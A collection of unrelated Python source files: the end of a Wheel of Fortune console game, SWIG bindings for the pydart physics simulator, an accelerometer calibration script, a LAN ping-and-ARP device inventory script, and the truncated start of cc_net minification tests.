if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j] + "."
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
"Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def end_game(players):
print "----------------------"
print "GAME OVER!"
print "----------------------"
print "Would you like to play again? (y/n)"
selection = string.lower(raw_input())
if selection == "y" or selection == "yes":
playerOrder_val = [[0, 0], [0, 0], [0, 0]]
game(players, playerOrder_val)
def get_numPlayers():
numPlayers = 0
while numPlayers <= 0 or numPlayers > 3:
print ""
print "How many contestants (max: 3) will be playing today?"
numPlayers = raw_input("Number of players: ",)
if numPlayers == "One" or numPlayers == "one" or numPlayers == "ONE" or numPlayers == "1":
numPlayers = 1
print "You have selected play for 1 player."
if numPlayers == "Two" or numPlayers == "two" or numPlayers == "TWO" or numPlayers == "2":
numPlayers = 2
print "You have selected play for 2 players."
if numPlayers == "Three" or numPlayers == "three" or numPlayers == "THREE" or numPlayers == "3":
numPlayers = 3
print "You have selected play for 3 players."
if numPlayers < 1 or numPlayers > 3 or numPlayers == type(int):
print string.center(("-" * 80), 80)
print "ERROR: INVALID PLAYER NUMBER"
raw_input (string.center(("-" * 80), 80))
return numPlayers
def get_playerNames(numPlayers, playerNames_hum, playerNames_comp):
players = ["Player 1", "Player 2", "Player 3"]
print ""
## print string.center(("-" * 80), 80)
## print string.center(("-" * 80), 80)
for i in range(numPlayers):
name = ""
while name == "":
name = raw_input(players[i] + ", what is your name? ")
name = name.title()
if name == "":
print ""
print string.center(("-" * 80), 80)
print string.expandtabs("ERROR, FIELD EMPTY")
print string.expandtabs("Please try again.")
print string.center(("-" * 80), 80)
print ""
players[i] = name
if numPlayers == 3:
print ""
## print string.center(("-" * 80), 80)
print string.center(("-" * 80), 80)
print ""
print "Welcome", players[0] + ",", players[1] + ", and", players[2] + "!"
print ""
if numPlayers == 2:
players[2] = playerNames_comp[0]
print ""
## print string.center(("-" * 80), 80)
print "Welcome", players[0] + " and", players[1] + "! Today you will be playing against", players[2] + "."
if numPlayers == 1:
players[1] = playerNames_comp[0]
players[2] = playerNames_comp[1]
print ""
## print string.center(("-" * 80), 80)
print "Welcome", players[0] + "! Today you will be playing against", players[1], "and", players[2] + "."
return players
def get_playerOrder(players, playerOrder_val):
playerOrder = [0, 0, 0]
print "We will now play the Toss-Up Puzzle for possession of The Wheel in the first"
print "round."
print ""
print players[0] + " will spin first."
print ""
print string.center(("-" * 80), 80)
raw_input ("Press 'ENTER' to continue: ")
for i in (0, 1, 2):
## if i == 0:
## print ""
## print players[i] + " will spin first."
print ""
print players[i] + ", get ready. You're up next!"
print players[i] + " prepares to spin The Wheel."
## print string.center(("-" * 80), 80)
print ""
raw_input("Press 'ENTER' to spin The Wheel. ")
print ""
print string.center(("-" * 80), 80)
print string.center((players[i] + " received $" + str(i * 100) + "."), 80)
print string.center(("-" * 80), 80)
for j in (0, 1):
if j == 0:
playerOrder_val[i][j] = (i * 100)
else:
playerOrder_val[i][j] = players[i]
playerOrder_val.sort(reverse=True)
for i in range(3):
playerOrder[i] = playerOrder_val[i][1]
print ""
print "Congratulations,", playerOrder[0] + "! You have won the Toss-Up Spin and will take possession"
print "of The Wheel at the beginning of the first round."
print ""
print playerOrder[1] + " will Take possession of The Wheel after", playerOrder[0] + ", followed by", playerOrder[2] + "."
print ""
print string.center(("-" * 80), 80)
raw_input ("Press 'ENTER' to begin the first round: ")
print ""
return playerOrder
def get_playerOrder_val(playerOrder_val):
for i in (0, 1):
if j == 0:
playerOrder_val[i][j] = (i * 100)
def get_guessConsonant():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a letter: ",))
if len(guess) == 1 and guess in ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "q", "r", "s", "t", "v", "w", "x", "z"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
if guess in ["a", "e", "i", "o", "u", "y"]:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Entry must be a consonant."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_guessfreePlay():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a letter: ",))
if len(guess) == 1 and guess in ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_guessVowel():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a vowel: ",))
if len(guess) == 1 and guess in ["a", "e", "i", "o", "u", "y"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
if guess in ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "q", "r", "s", "t", "v", "w", "x", "z"]:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Entry must be a vowel."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_prize(game_round):
prize = 0
if game_round == 1:
prizes = ["bankrupt", "bankrupt", "bankrupt", "bankrupt", "bankrupt",
"bankrupt", "bankrupt", "bankrupt", 500, 500, 500, 500, 500, 500, 500, 500,
500, 500, 500, 500, 550, 550, 550, 600, 600, 600, 600, 600,
600, 650, 650, 650, 650, 650, 650, 700, 700, 700, 700, 700,
700, 700, 700, 700, 800, 800, 800, 800, 800, 800, 900, 900,
900, 900, 900, 900, 900, 900, 900, 2500, 2500, 2500, "loseATurn",
"loseATurn", "loseATurn", "freePlay", "freePlay", "freePlay", 750, 750,
750, 750]
prize = prizes[random.randint(0, 71)]
if game_round == 2:
prizes = ["bankrupt", "bankrupt", "bankrupt", "bankrupt", "bankrupt",
"bankrupt", "bankrupt", "bankrupt", 500, 500, 500, 500, 500, 500, 500, 500,
500, 500, 500, 500, 550, 550, 550, 600, 600, 600, 600, 600,
600, 650, 650, 650, 650, 650, 650, 700, 700, 700, 700, 700,
700, 700, 700, 700, 800, 800, 800, 800, 800, 800, 900, 900,
900, 900, 900, 900, 900, 900, 900, 3500, 3500, 3500, "loseATurn",
"loseATurn", "loseATurn", "freePlay", "freePlay", "freePlay", 750, 750,
750, 750]
prize = prizes[random.randint(0, 71)]
if game_round == 3:
prizes = ["bankrupt", "bankrupt", "bankrupt", "bankrupt", "bankrupt",
"bankrupt", "bankrupt", "bankrupt", 500, 500, 500, 500, 500, 500, 500, 500,
500, 500, 500, 500, 550, 550, 550, 600, 600, 600, 600, 600,
600, 650, 650, 650, 650, 650, 650, 700, 700, 700, 700, 700,
700, 700, 700, 700, 800, 800, 800, 800, 800, 800, 900, 900,
900, 900, 900, 900, 900, 900, 900, 3500, 3500, 3500, "loseATurn",
"loseATurn", "loseATurn", "freePlay", "freePlay", "freePlay", 750, 750,
750, 750]
prize = prizes[random.randint(0, 71)]
if game_round == 4:
prizes = ["bankrupt", "bankrupt", "bankrupt", "bankrupt", "bankrupt",
"bankrupt", "bankrupt", "bankrupt", 500, 500, 500, 500, 500, 500, 500, 500,
500, 500, 500, 500, 550, 550, 550, 600, 600, 600, 600, 600,
600, 650, 650, 650, 650, 650, 650, 700, 700, 700, 700, 700,
700, 700, 700, 700, 800, 800, 800, 800, 800, 800, 900, 900,
900, 900, 900, 900, 900, 900, 900, 5000, 5000, 5000, "loseATurn",
"loseATurn", "loseATurn", "freePlay", "freePlay", "freePlay", 750, 750,
750, 750]
prize = prizes[random.randint(0, 71)]
return prize
def get_guessWord():
print ""
guess = string.lower(raw_input("Input puzzle solution: ",))
print ""
return guess
def check_guessLetter(guess, hidden_word, disp_word):
## Exact same as bodies of rounds one through four! Figure out implementation
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
print "Good guess:", disp_word
return true
else:
return false
def get_freePlayChoice(playerOrder, j):
selection_freePlay = 0
choice = False
while choice is False:
while selection_freePlay != "letter" or selection_freePlay != "choose" or selection_freePlay != "s" or selection_freePlay != "solve" or selection_freePlay != "choose a letter" or selection_freePlay != "pick" or selection_freePlay != "pick a letter" or selection_freePlay == "solve the puzzle":
print string.center(("-" * 80), 80)
print ""
print playerOrder[j] + ", would you like to solve the puzzle or choose a letter?"
selection_freePlay = raw_input("Selection: ")
selection_freePlay = selection_freePlay.lower()
if selection_freePlay == "letter" or selection_freePlay == "choose" or selection_freePlay == "s" or selection_freePlay == "solve the puzzle" or selection_freePlay == "solve" or selection_freePlay == "choose a letter" or selection_freePlay == "pick" or selection_freePlay == "pick a letter":
break
else:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: UNRECOGNIZED COMMAND."
print "Please select from the following and try again:"
print "'SOLVE'"
print "'LETTER'"
print "'CHOOSE'"
print "'CHOOSE A LETTER'"
print "'PICK'"
print "'PICK A LETTER'"
print string.center(("-" * 80) , 80)
print ""
if selection_freePlay == "pick a letter" or selection_freePlay == "pick" or selection_freePlay == "letter" or selection_freePlay == "choose":
selection_freePlay = 1
return selection_freePlay
if selection_freePlay == "solve" or selection_freePlay == "solve the puzzle" or selection_freePlay == "s":
selection_freePlay = 2
return selection_freePlay
def get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round):
selection = 0
choice = False
while choice is False:
while selection != "solve" or selection != "spin" or selection != "s" or selection != "pick" or selection != "solve the puzzle" or selection != "buy" or selection != "buy a vowel" or selection != "vowel" or selection != "v":
print string.center(("-" * 80), 80)
if playerOrder_val_round[j][0] >= 250:
print ""
print playerOrder[j] + ", would you like to SPIN, BUY A VOWEL, or SOLVE THE PUZZLE?"
else:
print ""
print playerOrder[j] + ", would you like to SPIN or SOLVE THE PUZZLE?"
selection = raw_input("Selection: ")
selection = selection.lower()
if selection == "solve" or selection == "pick" or selection == "spin" or selection == "solve the puzzle" or selection == "buy" or selection == "buy a vowel" or selection == "vowel" or selection == "v":
break
else:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: UNRECOGNIZED COMMAND."
print "Please select from the following and try again:"
print "'SOLVE'"
print "'BUY A VOWEL'"
print "'SPIN'"
if selection == "pick a letter" or selection == "pick" or selection == "spin" or selection == "letter":
selection = 1
return selection
if selection == "buy" or selection == "buy a vowel" or selection == "vowel":
if playerOrder_val_round[j][0] >= 250:
selection = 3
return selection
else:
print ""
print "You need a round prize of at least $250 in order to buy a vowel."
print "Please try again."
print ""
if selection == "solve" or selection == "solve the puzzle":
selection = 0
return selection
def remove_letterGuess(guess, alpha):
alpha = alpha.strip(guess)
return alpha
def get_hidden_word(hidden_word, used_letters):
"""Returns a string of the form __ad___ by filling in correct guesses"""
visible_word = ""
for letter in hidden_word:
if letter in used_letters:
visible_word += letter
else:
if len(visible_word) > 0 and visible_word[-1] == '_':
visible_word += " "
visible_word += "_"
return visible_word
start()
| StarcoderdataPython |
3282187 | <filename>optskills/pydart/pydart_api.py
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_pydart_api', [dirname(__file__)])
except ImportError:
import _pydart_api
return _pydart_api
if fp is not None:
try:
_mod = imp.load_module('_pydart_api', fp, pathname, description)
finally:
fp.close()
return _mod
_pydart_api = swig_import_helper()
del swig_import_helper
else:
import _pydart_api
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def init():
return _pydart_api.init()
init = _pydart_api.init
def destroy():
return _pydart_api.destroy()
destroy = _pydart_api.destroy
def createWorld(*args):
return _pydart_api.createWorld(*args)
createWorld = _pydart_api.createWorld
def createWorldFromSkel(*args):
return _pydart_api.createWorldFromSkel(*args)
createWorldFromSkel = _pydart_api.createWorldFromSkel
def destroyWorld(*args):
return _pydart_api.destroyWorld(*args)
destroyWorld = _pydart_api.destroyWorld
def addSkeleton(*args):
return _pydart_api.addSkeleton(*args)
addSkeleton = _pydart_api.addSkeleton
def numSkeletons(*args):
return _pydart_api.numSkeletons(*args)
numSkeletons = _pydart_api.numSkeletons
def setSkeletonJointDamping(*args):
return _pydart_api.setSkeletonJointDamping(*args)
setSkeletonJointDamping = _pydart_api.setSkeletonJointDamping
def resetWorld(*args):
return _pydart_api.resetWorld(*args)
resetWorld = _pydart_api.resetWorld
def stepWorld(*args):
return _pydart_api.stepWorld(*args)
stepWorld = _pydart_api.stepWorld
def render(*args):
return _pydart_api.render(*args)
render = _pydart_api.render
def renderSkeleton(*args):
return _pydart_api.renderSkeleton(*args)
renderSkeleton = _pydart_api.renderSkeleton
def renderSkeletonWithColor(*args):
return _pydart_api.renderSkeletonWithColor(*args)
renderSkeletonWithColor = _pydart_api.renderSkeletonWithColor
def getWorldTime(*args):
return _pydart_api.getWorldTime(*args)
getWorldTime = _pydart_api.getWorldTime
def getWorldTimeStep(*args):
return _pydart_api.getWorldTimeStep(*args)
getWorldTimeStep = _pydart_api.getWorldTimeStep
def setWorldTimeStep(*args):
return _pydart_api.setWorldTimeStep(*args)
setWorldTimeStep = _pydart_api.setWorldTimeStep
def getWorldSimFrames(*args):
return _pydart_api.getWorldSimFrames(*args)
getWorldSimFrames = _pydart_api.getWorldSimFrames
def setWorldSimFrame(*args):
return _pydart_api.setWorldSimFrame(*args)
setWorldSimFrame = _pydart_api.setWorldSimFrame
def getWorldNumContacts(*args):
return _pydart_api.getWorldNumContacts(*args)
getWorldNumContacts = _pydart_api.getWorldNumContacts
def getWorldContacts(*args):
return _pydart_api.getWorldContacts(*args)
getWorldContacts = _pydart_api.getWorldContacts
def getSkeletonMass(*args):
return _pydart_api.getSkeletonMass(*args)
getSkeletonMass = _pydart_api.getSkeletonMass
def getSkeletonNumBodies(*args):
return _pydart_api.getSkeletonNumBodies(*args)
getSkeletonNumBodies = _pydart_api.getSkeletonNumBodies
def getSkeletonNumDofs(*args):
return _pydart_api.getSkeletonNumDofs(*args)
getSkeletonNumDofs = _pydart_api.getSkeletonNumDofs
def getSkeletonBodyName(*args):
return _pydart_api.getSkeletonBodyName(*args)
getSkeletonBodyName = _pydart_api.getSkeletonBodyName
def getSkeletonDofName(*args):
return _pydart_api.getSkeletonDofName(*args)
getSkeletonDofName = _pydart_api.getSkeletonDofName
def getSkeletonPositions(*args):
return _pydart_api.getSkeletonPositions(*args)
getSkeletonPositions = _pydart_api.getSkeletonPositions
def getSkeletonVelocities(*args):
return _pydart_api.getSkeletonVelocities(*args)
getSkeletonVelocities = _pydart_api.getSkeletonVelocities
def getSkeletonMassMatrix(*args):
return _pydart_api.getSkeletonMassMatrix(*args)
getSkeletonMassMatrix = _pydart_api.getSkeletonMassMatrix
def getSkeletonCoriolisAndGravityForces(*args):
return _pydart_api.getSkeletonCoriolisAndGravityForces(*args)
getSkeletonCoriolisAndGravityForces = _pydart_api.getSkeletonCoriolisAndGravityForces
def getSkeletonConstraintForces(*args):
return _pydart_api.getSkeletonConstraintForces(*args)
getSkeletonConstraintForces = _pydart_api.getSkeletonConstraintForces
def setSkeletonPositions(*args):
return _pydart_api.setSkeletonPositions(*args)
setSkeletonPositions = _pydart_api.setSkeletonPositions
def setSkeletonVelocities(*args):
return _pydart_api.setSkeletonVelocities(*args)
setSkeletonVelocities = _pydart_api.setSkeletonVelocities
def setSkeletonForces(*args):
return _pydart_api.setSkeletonForces(*args)
setSkeletonForces = _pydart_api.setSkeletonForces
def getSkeletonPositionLowerLimit(*args):
return _pydart_api.getSkeletonPositionLowerLimit(*args)
getSkeletonPositionLowerLimit = _pydart_api.getSkeletonPositionLowerLimit
def getSkeletonPositionUpperLimit(*args):
return _pydart_api.getSkeletonPositionUpperLimit(*args)
getSkeletonPositionUpperLimit = _pydart_api.getSkeletonPositionUpperLimit
def getSkeletonForceLowerLimit(*args):
return _pydart_api.getSkeletonForceLowerLimit(*args)
getSkeletonForceLowerLimit = _pydart_api.getSkeletonForceLowerLimit
def getSkeletonForceUpperLimit(*args):
return _pydart_api.getSkeletonForceUpperLimit(*args)
getSkeletonForceUpperLimit = _pydart_api.getSkeletonForceUpperLimit
def getSkeletonWorldCOM(*args):
return _pydart_api.getSkeletonWorldCOM(*args)
getSkeletonWorldCOM = _pydart_api.getSkeletonWorldCOM
def getSkeletonWorldCOMVelocity(*args):
return _pydart_api.getSkeletonWorldCOMVelocity(*args)
getSkeletonWorldCOMVelocity = _pydart_api.getSkeletonWorldCOMVelocity
def getBodyNodeMass(*args):
return _pydart_api.getBodyNodeMass(*args)
getBodyNodeMass = _pydart_api.getBodyNodeMass
def getBodyNodeInertia(*args):
return _pydart_api.getBodyNodeInertia(*args)
getBodyNodeInertia = _pydart_api.getBodyNodeInertia
def getBodyNodeLocalCOM(*args):
return _pydart_api.getBodyNodeLocalCOM(*args)
getBodyNodeLocalCOM = _pydart_api.getBodyNodeLocalCOM
def getBodyNodeWorldCOM(*args):
return _pydart_api.getBodyNodeWorldCOM(*args)
getBodyNodeWorldCOM = _pydart_api.getBodyNodeWorldCOM
def getBodyNodeWorldCOMVelocity(*args):
return _pydart_api.getBodyNodeWorldCOMVelocity(*args)
getBodyNodeWorldCOMVelocity = _pydart_api.getBodyNodeWorldCOMVelocity
def getBodyNodeNumContacts(*args):
return _pydart_api.getBodyNodeNumContacts(*args)
getBodyNodeNumContacts = _pydart_api.getBodyNodeNumContacts
def getBodyNodeContacts(*args):
return _pydart_api.getBodyNodeContacts(*args)
getBodyNodeContacts = _pydart_api.getBodyNodeContacts
def getBodyNodeTransformation(*args):
return _pydart_api.getBodyNodeTransformation(*args)
getBodyNodeTransformation = _pydart_api.getBodyNodeTransformation
def getBodyNodeWorldLinearJacobian(*args):
return _pydart_api.getBodyNodeWorldLinearJacobian(*args)
getBodyNodeWorldLinearJacobian = _pydart_api.getBodyNodeWorldLinearJacobian
def addBodyNodeExtForce(*args):
return _pydart_api.addBodyNodeExtForce(*args)
addBodyNodeExtForce = _pydart_api.addBodyNodeExtForce
def addBodyNodeExtForceAt(*args):
return _pydart_api.addBodyNodeExtForceAt(*args)
addBodyNodeExtForceAt = _pydart_api.addBodyNodeExtForceAt
# This file is compatible with both classic and new-style classes.
| StarcoderdataPython |
3267623 | #!/usr/bin/env python
import yaml, sys
def calib_from_file(filename):
y = yaml.load(file(filename, 'r'))
lower = [[1e6]*3, [1e6]*3, [1e6]*3]
upper = [[-1e6]*3, [-1e6]*3, [-1e6]*3]
boards = { 'mm': 0, 'pp': 1, 'dp': 2 }
for sample in y:
for board_name, board_idx in boards.iteritems():
for axis in xrange(0,3):
if sample[board_name][axis] > upper[board_idx][axis]:
upper[board_idx][axis] = sample[board_name][axis]
if sample[board_name][axis] < lower[board_idx][axis]:
lower[board_idx][axis] = sample[board_name][axis]
bias = [[0]*3, [0]*3, [0]*3]
scale = [[0]*3, [0]*3, [0]*3]
for board_name, board_idx in boards.iteritems():
for axis in xrange(0, 3):
bias[board_idx][axis] = (upper[board_idx][axis] +
lower[board_idx][axis]) / 2
scale[board_idx][axis] = (upper[board_idx][axis] -
lower[board_idx][axis]) / 2
print "min: " + str(lower)
print "max: " + str(upper)
print "bias: " + str(bias)
print "scale: " + str(scale)
if __name__ == '__main__':
if len(sys.argv) != 2:
print "usage: calib_accels.py YAML_FILENAME"
sys.exit(1)
calib_from_file(sys.argv[1])
| StarcoderdataPython |
108696 | import subprocess
import sys
import ipaddress
import threading
import re
import time
import platform
from datetime import datetime
from multiprocessing import Queue
# Verifie que oui.txt est present sinon on le recupere
try:
file = open('oui.txt', encoding='utf-8', mode='r')
file.close()
except FileNotFoundError:
try:
import requests
print('[-] Le fichier "oui.txt" est manquant!')
print('[+] Telechargement du fichier..')
data = requests.get('http://standards-oui.ieee.org/oui.txt')
data = data.content.decode('utf-8')
file = open('oui.txt', encoding='utf-8', mode='w')
file.write(data)
file.close()
print('[+] Ecriture dans "oui.txt"..')
except (ImportError, ModuleNotFoundError):
print('[-] La librairie requests est necessaire pour telecharger le fichier requis!')
print('[-] Telecharger manuellement "oui.txt" depuis: http://standards-oui.ieee.org/oui.txt')
exit(1)
pass
# Recuperation et formatage de l'adresse
try:
ip = sys.argv[1]
except IndexError:
try:
ip = input('[>] Adresse IP: ')
ipaddress.ip_address(ip)
except ValueError:
print('[-] Adresse IP invalide!')
print('[-] Usage: python scan.py [adresse ip] [nb de threads]')
exit(1)
ip = ip.split('.')
ip.pop(-1)
ip = '.'.join(ip)+'.0/24'
ip = ipaddress.ip_network(ip)
iplist = [str(x) for x in ip.hosts()]
# Nombre de threads souhaiter
try:
thnumber = int(sys.argv[2])
except (IndexError, ValueError):
thnumber = 8
print(f'[+] Threads par defaut: {thnumber}')
# list stockant les appareils en ligne
online = []
# list stockant les ip en cours de traitement pour que les threads ne traite
# pas la meme IP
handled = []
# enregistrement horodatage
dt = datetime.now()
# verification du systeme d'exploitation
plat = True if platform.system() == 'Windows' else False
# instanciation de la queue pour les jobs
q = Queue()
for addr in iplist:
q.put(addr)
def worker():
while True:
addr = q.get() # on recupere un job contenant une addresse
if addr is None: # on retourne si il y a plus rien
return
if addr in handled: # on passe un tour si l'ip est deja
continue # en cours de traitement
handled.append(addr)
if not plat: # on ecrase les vars en fonction de l'OS
ping = ['ping', '-c', '1', '-W', '1000']
arp = ['arp']
else:
ping = ['ping', '-n', '1', '-w', '1000']
arp = ['arp', '-a']
ping.append(addr)
try:
proc = subprocess.run(ping, stdout=subprocess.DEVNULL, check=True) # on lance un process de ping
print(f'[+] {addr}')
except subprocess.CalledProcessError:
continue
# recuperation de la MAC address
arp.append(addr)
mac = None
vendor = None
try:
proc = subprocess.run(arp, stdout=subprocess.PIPE, universal_newlines=True, check=True)
mac = re.findall(r"(?:\w{2}-?:?){6}", str(proc.stdout),
re.MULTILINE | re.IGNORECASE)
mac = mac.pop().upper()
print(f'[+] {mac}')
try:
file = open("oui.txt", encoding="utf-8", mode="r")
lines = file.readlines()
ouimac = mac[0:8].split(':')
ouimac = '-'.join(ouimac)
for line in lines:
if ouimac in line:
vendor = line[16:].lstrip()
vendor = vendor.rstrip("\n")
break
file.close()
except FileNotFoundError:
print('[-] Fichier "oui.txt" manquant!')
pass
except (subprocess.CalledProcessError, ValueError, IndexError) as err:
print(f'[-] {addr} impossible de recuperer la MAC: [{err}]')
continue
if mac is not None:
if vendor is not None:
online.append((addr, mac, vendor))
else:
online.append((addr, mac, 'Inconnu'))
else:
online.append((addr, 'Inconnu', 'Inconnu'))
# Lancement des threads
threads = [threading.Thread(target=worker) for _i in range(thnumber)]
for thread in threads:
thread.start()
q.put(None)
for thread in threads:
thread.join()
print('[+] Classement par ordre croissant des adresses..')
# Classement croissant des addresses
online = sorted(online, key=lambda x: ipaddress.ip_address(x[0]))
time.sleep(1)
# Ecriture du fichier de log
log = dt.strftime("%d%m%y_%I%M%p")
log = f'scan_{log}.txt'
print(f'[+] Ecriture du resultat dans "{log}"..')
with open(log, encoding="utf-8", mode="w") as file:
content = ''
for item in online:
content = content + f'Adresse:\t{item[0]}\n'
try:
content = content + f'MAC:\t\t{item[1]}\n'
except IndexError:
pass
try:
content = content + f'Fabricant:\t{item[2]}\n'
except IndexError:
pass
content = content + '\n'
content = content + '\n---EOF---'
file.write(content)
time.sleep(1)
print('[+] Fin du script.')
input('[>] Appuyez sur Entree pour quitter..')
exit(0)
| StarcoderdataPython |
30404 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
sentences = ["Hello world !", "Is everyone happy in here ?"]
hashes = get_hashes(sentences)
assert all([len(h) == HASH_SIZE for h in hashes])
hashes_int = [minify._b2i(h) for h in hashes]
encoded = encode_hashes(hashes)
decoded = decode_hashes(encoded)
assert all([len(d) == HASH_SIZE for d in decoded])
decoded_int = [minify._b2i(d) for d in decoded]
assert hashes_int == decoded_int
assert hashes == decoded
def test_minify():
doc = {
"raw_content": "Hello world !\nIs everyone happy in here ?",
"language": "en",
"perplexity": 120.0,
"line_ids": [0, 4],
}
expected = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
minifier = minify.Minifier()
assert expected == minifier(doc)
@pytest.fixture
def http_from_disk(monkeypatch):
def read_sample_file(url: str, n_retry: int = 3) -> bytes:
expected_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
assert expected_url == url
file = Path(__file__).parent / "data" / "sample.warc.txt"
return file.read_bytes()
monkeypatch.setattr(cc_net.jsonql, "request_get_content", read_sample_file)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
# We don't need no education.
chosen_quotes = "\n".join(
l for l in full_quotes.splitlines() if "Education" not in l
)
cc_doc = {
"url": "http://sample_english.com",
"date_download": "2019-03-18T00:00:00Z",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"source_domain": "sample_english.com",
"title": "Famous Mark Twain Quotes",
"raw_content": full_quotes,
"cc_segment": "crawl-data/sample.warc.wet",
"nlines": 4,
"length": 353,
}
ccnet_metadata = {
"language": "en",
"language_score": 0.99,
"perplexity": 151.5,
"bucket": "head",
"raw_content": chosen_quotes,
"nlines": 3,
"length": len(chosen_quotes),
"original_nlines": 4,
"original_length": 353,
"line_ids": [0, 2, 3],
}
ccnet_doc = dict(cc_doc, **ccnet_metadata)
mini = minify.Minifier()(ccnet_doc.copy())
assert mini is not ccnet_doc
important_fields = [
"url",
"digest",
"cc_segment",
"language",
"language_score",
"perplexity",
"bucket",
"line_ids",
]
expected = {k: ccnet_doc[k] for k in important_fields}
expected["line_ids"] = encode_line_ids(expected["line_ids"]) # type: ignore
assert expected == mini
with jsonql.open_write(tmp_path / "sample.json") as o:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
# line_ids is removed when unminifying
ccnet_doc.pop("line_ids")
assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
mini_docs = [
{
"url": "http://sample_chinese.com",
"digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([2]),
"bucket": "not_that_great",
},
{
